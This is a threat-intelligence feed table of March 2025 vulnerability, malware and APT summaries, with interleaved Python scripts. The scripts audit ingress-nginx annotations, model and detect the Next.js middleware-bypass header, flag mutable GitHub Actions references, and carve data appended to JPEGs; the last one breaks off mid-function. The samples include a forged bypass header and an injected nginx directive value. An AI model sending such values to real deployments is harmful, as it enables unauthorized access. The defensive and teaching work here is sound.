DATE | NAME | CATEGORY | SUBCATEGORY | INFO |
31.3.25 |
ICS |
CISA analyzed three files obtained from a critical infrastructure’s Ivanti Connect Secure device after threat actors exploited Ivanti CVE-2025-0282 for initial access. One file—that CISA is calling RESURGE—has functionality similar to SPAWNCHIMERA in how it creates a Secure Shell (SSH) tunnel for command and control (C2). |
||
31.3.25 |
CVE-2025-0282 | VULNERABILITY | A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution. |
29.3.25 |
ANDROID |
Exposing Crocodilus: New Device Takeover Malware Targeting Android Devices |
||
29.3.25 |
CrushFTP | VULNERABILITY | CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access. |
29.3.25 |
INCIDENT |
Multiple Cloudflare services, including R2 object storage, experienced an elevated rate of errors for 1 hour and 7 minutes on March 21, 2025 (starting at 21:38 UTC and ending 22:45 UTC). |
||
29.3.25 |
PHISHING |
A browser-in-the-browser (BitB) attack is a new phishing technique that simulates a login window with a spoofed domain within a parent browser window to steal credentials. |
||
29.3.25 |
VULNERABILITY | NTLM Hash Disclosure Spoofing Vulnerability |
29.3.25 |
VULNERABILITY | Windows Themes Spoofing Vulnerability |
29.3.25 |
RANSOMWARE |
Blacklock Ransomware: A Late Holiday Gift with Intrusion into the Threat Actor's Infrastructure |
||
28.3.25 |
RAT |
ANALYSIS OF A DISCORD-BASED REMOTE ACCESS TROJAN (RAT) |
||
28.3.25 |
RAT |
Analysis of Konni RAT: Stealth, Persistence, and Anti-Analysis Techniques |
||
28.3.25 |
MALWARE |
Juniper Routers, Network Devices Targeted with Custom Backdoors |
||
28.3.25 |
MALWARE |
Gamaredon campaign abuses LNK files to distribute Remcos backdoor |
||
28.3.25 |
Remcos backdoor distributed in the latest campaign attributed to Shuckworm APT |
A new campaign attributed to the Shuckworm APT (aka Gamaredon) has been reported by researchers from Cisco Talos. According to the released report, the attackers are targeting users from Ukraine with malicious .LNK files and PowerShell downloaders before infecting them with Remcos RAT payload. |
||
28.3.25 |
Argenta is a bank based in Belgium and also operates in the Netherlands and Luxembourg. Recently, Symantec has detected a new wave of phish runs spoofing Argenta's bank services with fake account notifications. |
|||
28.3.25 |
RALord is a new Rust-based ransomware variant identified in the wild. The malware encrypts user data and appends ".RALord" extension to the names of the locked files. |
|||
28.3.25 |
SnakeKeylogger | MALWARE | Keylogger | SnakeKeylogger – A Multistage Info Stealer Malware Campaign |
28.3.25 |
CoffeeLoader | MALWARE | Loader | CoffeeLoader: A Brew of Stealthy Techniques |
28.3.25 |
2025-03-26 -- SmartApeSG traffic for fake browser update leads to NetSupport RAT and StealC |
MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
28.3.25 |
VIPKeyLogger Targets Japan’s Corporate Sector | ALERTS | VIRUS | VIPKeyLogger, a stealthy keylogging malware, has been observed in two phishing campaigns targeting Japanese organizations and international companies with local offices in Japan. |
28.3.25 |
PJobRAT Android malware | ALERTS | VIRUS | A new campaign distributing the PJobRAT malware for Android has been discovered by researchers from Sophos. The campaign mostly targets mobile users in Taiwan and aims at collecting and exfiltrating sensitive data, including SMS messages, contact lists, and documents and media files stored on the compromised devices. |
28.3.25 |
CVE-2025-24799 - SQL injection vulnerability in GLPI | VULNERABILITY | CVE-2025-24799 is a recently identified SQL injection vulnerability affecting GLPI, a popular open-source IT Service Management (ITSM) software. | |
28.3.25 |
PJobRAT | MALWARE | ANDROID RAT | PJobRAT makes a comeback, takes another crack at chat apps |
28.3.25 |
CVE-2025-2783 | VULNERABILITY | Incorrect handle provided in unspecified circumstances in Mojo in Google Chrome on Windows prior to 134.0.6998.177 allowed a remote attacker to perform a sandbox escape via a malicious file. (Chromium security severity: High) |
28.3.25 |
CVE-2025-2857 | VULNERABILITY | Following the recent Chrome sandbox escape (CVE-2025-2783), various Firefox developers identified a similar pattern in our IPC code. A compromised child process could cause the parent process to return an unintentionally powerful handle, leading to a sandbox escape. |
28.3.25 |
Morphing Meerkat | PHISHING | PHaaS | A Phishing Tale of DoH and DNS MX Abuse |
28.3.25 |
EDRKillShifter | MALWARE | Tool | Shifting the sands of RansomHub’s EDRKillShifter |
27.3.25 |
CVE-2025-29891 - Bypass/Injection vulnerability in Apache Camel | ALERTS | VULNERABILITY | CVE-2025-29891 is a second recently identified bypass/injection vulnerability affecting Apache Camel, a popular open-source integration framework. If successfully exploited, the flaw might enable remote attackers to inject arbitrary parameters into the HTTP requests that are sent to the Camel application. |
27.3.25 |
New Go-based ReaderUpdate macOS malware variant | ALERTS | VIRUS | A new Go-based strain of the macOS malware dubbed ReaderUpdate has been discovered in the wild. Previous variants of this malware were based on Crystal, Nim and Rust programming languages. |
27.3.25 |
Phishing Surge Targets Rakuten Securities Users | ALERTS | PHISHING | In recent weeks, there has been an increase in phishing campaigns targeting users of Rakuten Securities (楽天証券), one of Japan’s largest and most well-established online brokerage firms. The company offers a wide range of investment services, including stocks, ETFs, mutual funds, futures, options, forex trading, and NISA (Japan’s tax-advantaged investment accounts). |
27.3.25 |
New Android malware leverages .NET MAUI framework for detection evasion | VIRUS | A new Android malware variant leveraging .NET MAUI framework has been identified in the wild. .NET MAUI is a cross-platform framework used to build native, desktop and mobile apps with C# and XAML. | |
27.3.25 |
PlayBoy Locker Ransomware | RANSOM | PlayBoy Locker is a ransomware variant discovered last September and initially distributed in form of a Ransomware-as-a-Service (RaaS) offering. The ransomware platform offered multi-OS support including Windows, NAS and ESXi operating systems. | |
27.3.25 |
APT36 TURNING AID INTO ATTACK | APT | BLOG | TURNING AID INTO ATTACK: EXPLOITATION OF PAKISTAN’S YOUTH LAPTOP SCHEME TO TARGET INDIA |
27.3.25 |
UI/UX changes | HACKING | INJECT | Over 150K websites hit by full-page hijack linking to Chinese gambling sites |
27.3.25 |
CVE-2020-8515 | VULNERABILITY | (CVSS score: 9.8) - An operating system command injection vulnerability in multiple DrayTek router models that could allow remote code execution as root via shell metacharacters to the cgi-bin/mainfunction.cgi URI |
27.3.25 |
CVE-2021-20123 | VULNERABILITY | (CVSS score: 7.5) - A local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the DownloadFileServlet endpoint |
27.3.25 |
CVE-2021-20124 | VULNERABILITY | (CVSS score: 7.5) - A local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the WebServlet endpoint |
27.3.25 |
CVE-2019-9874 | VULNERABILITY | (CVSS score: 9.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF module that allows an unauthenticated attacker to execute arbitrary code by sending a serialized .NET object in the HTTP POST parameter __CSRFTOKEN |
27.3.25 |
CVE-2019-9875 | VULNERABILITY | (CVSS score: 8.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF module that allows an authenticated attacker to execute arbitrary code by sending a serialized .NET object in the HTTP POST parameter __CSRFTOKEN |
27.3.25 |
CVE-2025-26512 | VULNERABILITY | CVE-2025-26512 Privilege Escalation Vulnerability in SnapCenter |
27.3.25 |
FamousSparrow | GROUP | APT | You will always remember this as the day you finally caught FamousSparrow |
26.3.25 |
ZDI-25-187 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers sys ping Command Injection Remote Code Execution Vulnerability |
26.3.25 |
ZDI-25-186 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers Cleartext Password Storage Information Disclosure Vulnerability |
26.3.25 |
ZDI-25-185 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers Insufficiently Protected Credentials Information Disclosure Vulnerability |
26.3.25 |
ZDI-25-184 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers Authentication Bypass Vulnerability |
26.3.25 |
ZDI-25-183 | ZERO-DAY | ZERO-DAY | (0Day) Bdrive NetDrive Uncontrolled Search Path Element Local Privilege Escalation Vulnerability |
26.3.25 |
ZDI-25-182 | ZERO-DAY | ZERO-DAY | (0Day) Bdrive NetDrive Uncontrolled Search Path Element Local Privilege Escalation Vulnerability |
26.3.25 |
ZDI-25-181 | ZERO-DAY | ZERO-DAY | (0Day) Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability |
26.3.25 |
ZDI-25-180 | ZERO-DAY | ZERO-DAY | (0Day) 70mai A510 Use of Default Password Authentication Bypass Vulnerability |
26.3.25 |
ZDI-25-179 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA Improper Verification of Cryptographic Signature Code Execution Vulnerability |
26.3.25 |
ZDI-25-178 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA update.cgi Improper Verification of Cryptographic Signature Code Execution Vulnerability |
26.3.25 |
ZDI-25-177 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA Wireless Hotspot Hard-Coded Credentials Authentication Bypass Vulnerability |
26.3.25 |
ZDI-25-176 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA Missing Root of Trust Local Privilege Escalation Vulnerability |
26.3.25 |
CVE-2025-24813 - Critical path equivalence RCE vulnerability in Apache Tomcat | ALERTS | VULNERABILITY | Security researchers have observed active exploitation attempts of CVE-2025-24813, a critical Remote Code Execution (RCE) vulnerability in Apache Tomcat, an open-source servlet container and web server for Java applications. The flaw, caused by a path equivalence issue, allows attackers to bypass security constraints and execute arbitrary code remotely. |
26.3.25 |
Dragon RaaS Group: Ransomware targeting the US and European countries | ALERTS | RANSOM | Dragon RaaS, a ransomware group that emerged in July 2024, primarily targets organizations in the US, Israel, UK, France and Germany. The group leverages web application vulnerabilities, brute-force attacks and stolen credentials as its main attack vectors using two ransomware variants: a Windows-focused encryptor, likely a modified version of StormCry and a PHP webshell which provides both backdoor functionality and persistent ransomware capabilities. |
26.3.25 |
New JS downloader observed in recent malspam campaign | ALERTS | VIRUS | Symantec has observed a new email campaign delivering a JavaScript downloader as an attachment. The JS arrives under various filenames in an email with variable subjects. |
26.3.25 |
Funnelweb attack group targets victims in Operation FishMedley | OPERATION | The China-backed advanced persistent threat group known as Funnelweb (aka Aquatic Panda, Earth Lusca, FishMonger) was responsible for an extensive campaign identified as Operation FishMedley. The campaign targeted entities including governments, NGOs, and think tanks across numerous countries. | |
26.3.25 |
CVE-2025-26319 - Flowise Pre-Auth arbitrary file upload vulnerability | VULNERABILITY | CVE-2025-26319 is a recently disclosed pre-auth arbitrary file upload vulnerability affecting Flowise, a popular open-source tool for developers to build customized LLM (Large Language Model) orchestration flows and AI agents. | |
26.3.25 |
FogDoor backdoor delivery campaign | ALERTS | VIRUS | A new campaign targeting Polish-speaking job-seeking developers has been reported to deliver a new backdoor variant dubbed FogDoor. The attackers lure the victims with a fake recruitment test that leads to a download of a .iso archive containing a malicious .lnk file. The executed .lnk file runs a PowerShell script responsible for installing the malware payload. |
26.3.25 |
CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin | VULNERABILITY | Trend Research identified the Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console, to execute malicious code and exfiltrate data. |
26.3.25 |
CVE-2025-26633 | VULNERABILITY | Improper neutralization in Microsoft Management Console allows an unauthorized attacker to bypass a security feature locally. |
26.3.25 |
RedCurl | GROUP | APT | In mid to late 2024, Huntress uncovered activity across several organizations in Canada, with similar infrastructure and TTPs used that can be associated with the APT group known as RedCurl (aka Earth Kapre and Red Wolf). This activity goes back as far as November 2023 in the hosts observed by Huntress. |
26.3.25 |
CVE-2025-2783 | VULNERABILITY | The Stable channel has been updated to 134.0.6998.177/.178 for Windows, which will roll out over the coming days/weeks. A full list of changes in this build is available in the log. |
26.3.25 |
Inside Atlantis AIO | CRIME | CRIME | Inside Atlantis AIO: Credential Stuffing Across 140+ Platforms |
26.3.25 |
CVE-2025-22230 | VULNERABILITY | VMware Tools for Windows contains an authentication bypass vulnerability due to improper access control. A malicious actor with non-administrative privileges on a guest VM may gain the ability to perform certain high-privilege operations within that VM. |
25.3.25 |
CVE-2024-56346 & CVE-2024-56347 - recent IBM AIX OS vulnerabilities | ALERTS | VULNERABILITY | CVE-2024-56346 and CVE-2024-56347 are two recently disclosed critical (CVSS score 10.0 and 9.6 respectively) vulnerabilities affecting the IBM AIX operating system. |
25.3.25 |
SVCStealer malware | ALERTS | VIRUS | SVCStealer is a new C++-based infostealing malware identified in the wild. The infostealer collects various sensitive information from infected endpoints, such as system information, credentials, cryptocurrency wallets, data stored in browsers, screenshots, data from messaging applications (Discord, Tox, Telegram) or VPN apps, and more. |
25.3.25 |
Raspberry Robin | MALWARE | Worm | Raspberry Robin: Copy Shop USB Worm Evolves to Initial Access Broker Enabling Other Threat Actor Attacks |
25.3.25 |
Elephant Beetle | GROUP | GROUP | Elephant Beetle: Uncovering an Organized Financial-Theft Operation |
25.3.25 |
Operational Relay Box (ORB) | OPERATION | OPERATION | An Introduction to Operational Relay Box (ORB) Networks - Unpatched, Forgotten, and Obscured |
25.3.25 |
Weaver Ant | GROUP | GROUP | Weaver Ant, the Web Shell Whisperer: Tracking a Live China-nexus Operation |
25.3.25 |
.NET MAUI | CAMPAIGN | Malware | New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI |
25.3.25 |
CVE-2025-24513 | VULNERABILITY | (CVSS score: 4.8) - An improper input validation vulnerability that could result in directory traversal within the container, leading to denial-of-service (DoS) or limited disclosure of secret objects from the cluster when combined with other vulnerabilities |
25.3.25 |
CVE-2025-24514 | VULNERABILITY | (CVSS score: 8.8) - The auth-url Ingress annotation can be used to inject configuration into NGINX, resulting in arbitrary code execution in the context of the ingress-nginx controller and disclosure of secrets accessible to the controller |
25.3.25 |
CVE-2025-1097 | VULNERABILITY | (CVSS score: 8.8) - The auth-tls-match-cn Ingress annotation can be used to inject configuration into NGINX, resulting in arbitrary code execution in the context of the ingress-nginx controller and disclosure of secrets accessible to the controller |
25.3.25 |
CVE-2025-1098 | VULNERABILITY | (CVSS score: 8.8) - The mirror-target and mirror-host Ingress annotations can be used to inject arbitrary configuration into NGINX, resulting in arbitrary code execution in the context of the ingress-nginx controller and disclosure of secrets accessible to the controller |
25.3.25 |
CVE-2025-1974 | VULNERABILITY | (CVSS score: 9.8) - An unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller under certain conditions |
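The four annotation CVEs above share one mechanism: an annotation value that the controller templates into nginx.conf without adequate sanitization. The script below is an added example, not from the page and not ingress-nginx project code: it walks the "items" list of `kubectl get ingress -A -o json`, flags every Ingress carrying one of the named annotations, and marks values that contain nginx configuration metacharacters as likely injection attempts. The sample objects are constructed, the full annotation keys are the nginx.ingress.kubernetes.io/ forms of the short names the entries use, and the metacharacter heuristic is this script's own assumption.

```python
"""Triage Ingress objects for the annotations named in the ingress-nginx CVEs above.

Added example, not from the page and not ingress-nginx project code. Input is the
"items" list from `kubectl get ingress -A -o json`; the objects below are constructed.
The metacharacter heuristic is an assumption: the controller templates these values
into nginx.conf, so a value carrying newlines, semicolons or braces is consistent
with an attempt to break out of the directive it is placed in.
"""
import json
import re
from typing import Dict, List

PREFIX = "nginx.ingress.kubernetes.io/"
ANNOTATION_CVES = {
    PREFIX + "auth-url": "CVE-2025-24514",
    PREFIX + "auth-tls-match-cn": "CVE-2025-1097",
    PREFIX + "mirror-target": "CVE-2025-1098",
    PREFIX + "mirror-host": "CVE-2025-1098",
}
CONFIG_METACHARS = re.compile(r"[\n;{}#]")   # terminate/open nginx directives or blocks

def audit_ingresses(items: List[dict]) -> List[Dict[str, str]]:
    """One finding per risky annotation; 'likely-exploitation' when the value looks injected."""
    findings = []
    for ing in items:
        meta = ing.get("metadata", {})
        ref = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        for key, value in (meta.get("annotations") or {}).items():
            cve = ANNOTATION_CVES.get(key)
            if cve is None:
                continue
            injected = CONFIG_METACHARS.search(str(value)) is not None
            findings.append({
                "ingress": ref,
                "annotation": key[len(PREFIX):],
                "cve": cve,
                "severity": "likely-exploitation" if injected else "review",
                "value": str(value),
            })
    return findings

SAMPLE_ITEMS = [  # constructed
    {"metadata": {"namespace": "shop", "name": "web",
                  "annotations": {PREFIX + "rewrite-target": "/"}}},
    {"metadata": {"namespace": "shop", "name": "admin",
                  "annotations": {PREFIX + "auth-url": "https://sso.shop.svc/check"}}},
    {"metadata": {"namespace": "tenant-b", "name": "mirror",
                  "annotations": {PREFIX + "mirror-target": "http://m.tenant-b.svc;\ninjected_directive on;"}}},
]

if __name__ == "__main__":
    import sys
    # Run it directly for the constructed sample, or pipe real kubectl JSON into it.
    items = SAMPLE_ITEMS if sys.stdin.isatty() else json.load(sys.stdin)["items"]
    print(json.dumps(audit_ingresses(items), indent=2))
```

A clean result is not a clean bill of health: CVE-2025-1974 above goes through the admission webhook and needs no persisted Ingress object, so the fix is still to patch the controller and to keep the webhook reachable only from the API server. This check is for finding injection attempts that were persisted and for deciding which tenants may set these annotations at all.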
24.3.25 |
VanHelsing RaaS Launch | RANSOMWARE | RaaS | VanHelsingRaaS is a new and rapidly growing ransomware-as-a-service (RaaS) affiliate program launched on March 7, 2025. The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. |
24.3.25 |
CVE-2025-29927 | VULNERABILITY | Next.js is a React framework for building full-stack web applications. Prior to 14.2.25 and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. |
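The security-relevant point of this entry is that an authorization check that lives only in middleware is a single point of failure: anything that makes the framework skip the middleware exposes the route. The Python below is an added example, not Next.js code and not from the page. It models the failure mode framework-agnostically: the dispatcher skips middleware when a request carries the internal `x-middleware-subrequest` header, which is the skip trigger named in the public advisory for CVE-2025-29927; the routes, user model and dispatcher are constructed for illustration.

```python
"""Model of the CVE-2025-29927 failure mode: authorization that lives only in middleware.

Added example in plain Python, not Next.js code. The dispatcher imitates the
vulnerable behaviour: a request carrying the framework's internal
x-middleware-subrequest header is taken for the framework's own recursive
sub-request and middleware is skipped. Routes, users and dispatcher are constructed.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional

SKIP_HEADER = "x-middleware-subrequest"

@dataclass
class Request:
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    user: Optional[str] = None   # would come from a session lookup in a real app

def is_authorized(req: Request) -> bool:
    """Toy policy: anything under /admin requires the 'admin' user."""
    return req.user == "admin" if req.path.startswith("/admin") else True

def auth_middleware(req: Request) -> Optional[int]:
    """Return a status to short-circuit the request, or None to let it through."""
    return None if is_authorized(req) else 403

def admin_handler_vulnerable(req: Request) -> int:
    return 200                                   # trusts that middleware already ran

def admin_handler_hardened(req: Request) -> int:
    return 200 if is_authorized(req) else 403    # middleware is defence in depth only

def dispatch(req: Request, handler: Callable[[Request], int], *, skippable: bool) -> int:
    """skippable=True models the unpatched framework: the internal header disables middleware."""
    header_names = {h.lower() for h in req.headers}
    if not (skippable and SKIP_HEADER in header_names):
        status = auth_middleware(req)
        if status is not None:
            return status
    return handler(req)

def vulnerable_app(req: Request) -> int:
    return dispatch(req, admin_handler_vulnerable, skippable=True)

def hardened_app(req: Request) -> int:
    # Same unpatched framework behaviour, but the handler enforces the policy itself.
    return dispatch(req, admin_handler_hardened, skippable=True)

def detect_bypass_attempt(headers: Dict[str, str]) -> bool:
    """Edge check: no external client has a legitimate reason to send the internal header."""
    return SKIP_HEADER in {h.lower() for h in headers}

if __name__ == "__main__":
    anon = Request("/admin")
    forged = Request("/admin", headers={"X-Middleware-Subrequest": "middleware"})
    print("anonymous -> vulnerable app:", vulnerable_app(anon))        # 403
    print("forged header -> vulnerable app:", vulnerable_app(forged))  # 200 (bypass)
    print("forged header -> hardened app:", hardened_app(forged))      # 403
    print("flag at the edge:", detect_bypass_attempt(forged.headers))  # True
```

Upgrading to the fixed versions the entry names is the fix; until then, dropping the header at the reverse proxy closes the skip, and `detect_bypass_attempt` is the same test written as a log or WAF rule. The hardened handler is the durable lesson: the data access layer should enforce the policy regardless of what ran before it.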
23.3.25 |
CVE-2024-48248 | VULNERABILITY | NAKIVO Backup & Replication before 11.0.0.88174 allows absolute path traversal for reading files via getImageByPath to /c/router (this may lead to remote code execution across the enterprise because PhysicalDiscovery has cleartext credentials). |
23.3.25 |
CVE-2024-20439 | VULNERABILITY | Cisco Smart Licensing Utility Static Credential Vulnerability |
23.3.25 |
CVE-2024-20440 | VULNERABILITY | Cisco Smart Licensing Utility Information Disclosure Vulnerability |
23.3.25 |
CVE-2025-30154 | VULNERABILITY | reviewdog/action-setup is a GitHub action that installs reviewdog. reviewdog/action-setup@v1 was compromised March 11, 2025, between 18:42 and 20:31 UTC, with malicious code added that dumps exposed secrets to GitHub Actions workflow logs |
23.3.25 |
CVE-2025-30066 | VULNERABILITY | tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.) |
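Both action compromises above worked the same way: a version tag such as v1 or v45.0.7 is a mutable pointer, so whoever can move it controls what every workflow pinned to it runs, while a reference pinned to a full commit SHA keeps running the commit that was reviewed. The script below is an added example, not from the page and not code from either project: it scans workflow text for `uses:` references, flags any that are not pinned to a 40-character SHA, and separately flags the two actions the entries name. The workflow text and the SHA in it are constructed.

```python
"""Audit GitHub Actions workflow text for mutable action references.

Added example; not from the page and not code from either affected project.
The sample workflow and the SHA it contains are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import List

# Actions named in the two CVE entries above; anything else is flagged only by the
# mutable-reference rule, not because of a known compromise.
KNOWN_COMPROMISED = {"tj-actions/changed-files", "reviewdog/action-setup"}

# `uses: owner/repo[/path]@ref`; local (./...) and docker:// references have no repo@ref form.
USES_RE = re.compile(r"^[ \t]*-?[ \t]*uses:[ \t]*([\w.-]+/[\w.-]+(?:/[\w./-]+)?)@(\S+)", re.M)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

@dataclass
class Finding:
    line: int
    action: str
    ref: str
    reason: str

def audit_workflow(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for m in USES_RE.finditer(text):
        action, ref = m.group(1), m.group(2)
        line = text.count("\n", 0, m.start()) + 1
        repo = "/".join(action.split("/")[:2])  # owner/repo/subdir resolves in the same repo
        if repo in KNOWN_COMPROMISED:
            findings.append(Finding(line, action, ref,
                "named in a March 2025 compromise: rotate every secret this workflow could see and read its logs"))
        if not FULL_SHA_RE.match(ref):
            findings.append(Finding(line, action, ref,
                "mutable reference (tag or branch): pin to the full 40-character commit SHA"))
    return findings

SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: tj-actions/changed-files@v45
      - uses: reviewdog/action-setup@v1
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v4 (constructed SHA)
      - name: build
        run: npm ci && npm test
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WORKFLOW
    for f in audit_workflow(text):
        print(f"line {f.line}: {f.action}@{f.ref}: {f.reason}")
```

Run it over every file under `.github/workflows/`. Pinning by SHA does not by itself protect against a compromised dependency of the action, and the trailing `# v4` comment convention is what keeps SHA-pinned references readable for review.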
22.3.25 |
New variants of the Albabat ransomware implement multi-OS capabilities | ALERTS | RANSOM | A new strain of the Albabat ransomware has been reported to offer multi-OS support, according to a recent report from Trend Micro. The new variant is still under active development and adds Linux and macOS to the list of targeted platforms. |
22.3.25 |
New phishing campaign targets Pocket Card users | PHISHING | Symantec has detected a phishing campaign targeting Japanese users with fake Pocket Card notification emails. The emails use the subject line: | |
22.3.25 |
VanHelsing Ransomware | RANSOM | VanHelsing is a new ransomware variant recently identified in the wild. The malware encrypts user data and appends .vanhelsing or .vanlocker extension to the locked files. VanHelsing drops the ransom note in form of a text file called “README.txt” and it is also able to modify the desktop wallpaper. | |
22.3.25 |
Campaign impersonating travel bookings site using “ClickFix" technique | ALERTS | CAMPAIGN | A phishing campaign impersonating Booking.com to deliver credential stealing malware has been observed targeting hospitality organizations in Asia, North America, Oceania, and Europe. The attackers send fake emails impersonating the online travel agency. |
22.3.25 |
Recent UAT-5918 APT malicious activities targeting entities in Taiwan | APT | Researchers from Cisco Talos have reported a long-lasting campaign targeting entities in Taiwan and attributed to the UAT-5918 APT. The attackers are known to obtain access to the targeted environments usually via vulnerability exploitation. | |
22.3.25 |
DarkCrystal RAT distributed in malicious campaign UAC-0200 | VIRUS | According to a recent alert released by Ukraine's Computer Emergency Response Team (CERT-UA), a new wave of attacks against the defense sector in Ukraine has been detected. The campaign, tracked as UAC-0200, distributes malicious messages via the Signal messenger that lead victims to execute the DarkTortilla loader, which in turn decrypts and runs the DarkCrystal RAT (aka DCRat) payload. | |
22.3.25 |
Custom Betruger backdoor deployed by RansomHub affiliate | The Symantec Threat Hunter team has observed activity from a custom backdoor that can be tied to a RansomHub affiliate. RansomHub is a Ransomware-as-a-Service offering and the backdoor has been named Betruger. | ||
21.3.25 |
Bloody Wolf | MALWARE | Toolkit | The notorious cluster changes its toolkit by switching from malware to a legitimate remote administration tool |
21.3.25 |
ABYSSWORKER | MALWARE | Driver | Shedding light on the ABYSSWORKER driver |
21.3.25 |
Operation FishMedley | OPERATION | OPERATION | ESET researchers detail a global espionage operation by FishMonger, the APT group run by I‑SOON |
21.3.25 |
UAT-5918 | GROUP | GROUP | UAT-5918 targets critical infrastructure entities in Taiwan |
21.3.25 |
Trusted relationship attacks | ATTACK | ATTACK | Trusted relationship attacks: trust, but verify |
21.3.25 |
-=TWELVE=- | GROUP | GROUP | -=TWELVE=- is back |
21.3.25 |
Head Mare | GROUP | GROUP | Head Mare: adventures of a unicorn in Russia and Belarus |
21.3.25 |
Arcane stealer | MALWARE | Stealer | What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. |
21.3.25 |
CVE-2024-20439 | VULNERABILITY | (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an affected system |
21.3.25 |
CVE-2024-20440 | VULNERABILITY | (CVSS score: 9.8) - A vulnerability arising from an excessively verbose debug log file that an attacker could exploit, by means of a crafted HTTP request, to access such files and obtain credentials that can be used to access the API |
21.3.25 |
CVE-2024-56347 | VULNERABILITY | (CVSS score: 9.6) - An improper access control vulnerability that could permit a remote attacker to execute arbitrary commands via the AIX nimsh service SSL/TLS protection mechanism |
21.3.25 |
CVE-2024-56346 | VULNERABILITY | (CVSS score: 10.0) - An improper access control vulnerability that could permit a remote attacker to execute arbitrary commands via the AIX nimesis NIM master service |
21.3.25 |
CVE-2025-23120 | VULNERABILITY | A vulnerability allowing remote code execution (RCE) by authenticated domain users. |
20.3.25 |
ZDI-25-175 | ZERO-DAY | ZERO-DAY | (0Day) Luxion KeyShot USDC File Parsing Use-After-Free Remote Code Execution Vulnerability |
20.3.25 |
ZDI-25-174 | ZERO-DAY | ZERO-DAY | (0Day) Luxion KeyShot DAE File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability |
20.3.25 |
ZDI-25-173 | ZERO-DAY | ZERO-DAY | (0Day) Luxion KeyShot DAE File Parsing Access of Uninitialized Pointer Remote Code Execution Vulnerability |
20.3.25 |
Paragon's Android Spyware | MALWARE | Android | Virtue or Vice? A First Look at Paragon's Proliferating Spyware Operations |
20.3.25 |
CVE-2025-1316 | VULNERABILITY | (CVSS score: 9.3) - Edimax IC-7100 IP camera contains an OS command injection vulnerability due to improper input sanitization that allows an attacker to achieve remote code execution via specially crafted requests (unpatched because the device has reached end-of-life) |
20.3.25 |
CVE-2017-12637 | VULNERABILITY | (CVSS score: 7.5) - SAP NetWeaver Application Server (AS) Java contains a directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS that allows a remote attacker to read arbitrary files via a .. (dot dot) in the query string |
20.3.25 |
New steganographic malware campaign exploits JPEG files to distribute infostealers | ALERTS | VIRUS | A new steganographic malware campaign has been identified, using JPEG image files to distribute various infostealers. The attack starts by luring users into downloading an obfuscated JPEG file that contains hidden malicious scripts and executables. |
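One common way to hide a script or executable "inside" a JPEG is simply to append it after the end-of-image marker: viewers stop decoding at EOI, so the picture still renders and the payload rides along for a later stage to carve out. The walker below is an added example, not from the page: it follows the JPEG marker structure to the real EOI (so a 0xFFD9 byte pair inside entropy-coded data does not fool it), returns whatever follows, and runs a cheap triage over it. The sample image bytes are a constructed marker skeleton rather than a real photo, and the indicator strings are this example's own heuristics.

```python
"""Find and triage data appended after a JPEG's end-of-image marker.

Added example, not from the page. The sample image is a constructed marker
skeleton (not a decodable picture); the indicator strings are this example's own.
"""
import struct
from typing import Dict

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
RST = set(range(0xD0, 0xD8))
STANDALONE = {0x01, SOI, EOI} | RST          # markers that carry no length field

def jpeg_trailing_data(data: bytes) -> bytes:
    """Return the bytes after the real EOI marker; b"" if none or the file is truncated."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    i = 2
    while i + 1 < len(data):
        if data[i] != 0xFF:
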